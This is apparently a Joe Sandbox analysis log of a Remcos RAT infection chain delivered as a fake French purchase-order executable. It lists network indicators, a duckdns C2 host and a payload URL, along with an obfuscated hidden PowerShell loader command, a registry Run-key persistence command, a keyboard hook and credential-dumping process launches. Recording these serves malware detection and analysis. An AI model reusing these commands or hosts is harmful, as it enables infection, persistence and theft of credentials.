Source: Yara match | File source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Joe Sandbox ML: detected
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Joe Sandbox ML: detected
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.191.112:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb | source: powershell.exe, 00000002.00000002.2923098281.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: qm.Core.pdb | source: powershell.exe, 00000002.00000002.2926478638.0000000008029000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb | source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb | source: powershell.exe, 00000002.00000002.2923098281.0000000006F08000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00405FE2 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00402645 FindFirstFileA
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\

Networking

Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49708 -> 193.222.96.21:29871
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.6:49708
Source: Malware configuration extractor | URLs: learfo55ozj01.duckdns.org
Source: global traffic | TCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
Source: unknown | DNS query: name: learfo55ozj01.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 193.222.96.21:29871
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | IP Address: 193.222.96.21
Source: Joe Sandbox View | ASN Name: SWISSCOMSwisscomSwitzerlandLtdCH
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /aCqwFQDQz144.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ricohltd.top | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | HTTP traffic detected: GET /aCqwFQDQz144.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ricohltd.top | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: ricohltd.top
Source: global traffic | DNS traffic detected: DNS query: learfo55ozj01.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpP
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpe
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpen
Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gprfo2
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/
Source: wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/-
Source: wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/aCqwFQDQz144.bin
Source: wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ricohltd.top/aCqwFQDQz144.bin-_
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 172.67.191.112:443 -> 192.168.2.6:49707 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

            E-Banking Fraud

Source: Yara match | File source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

            System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_05C4C53D Sleep,LdrInitializeThunk,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00404946
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_004062B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0465F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0465F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0465ECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0718BB08
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054720455.0000000000432000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamefetichdyrkerne conservatism.exe* vs Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@57/41@4/3
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | File created: C:\Users\user\AppData\Local\salpetersyrefabrikkers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4372
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess352
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6908
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3352
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6212
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5996
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\alpwovnb-G3F5OR
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6932
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | File created: C:\Users\user\AppData\Local\Temp\nsi820E.tmp
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | File read: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Source: unknown | Process created: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 12
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | Section loaded: coremessaging.dll
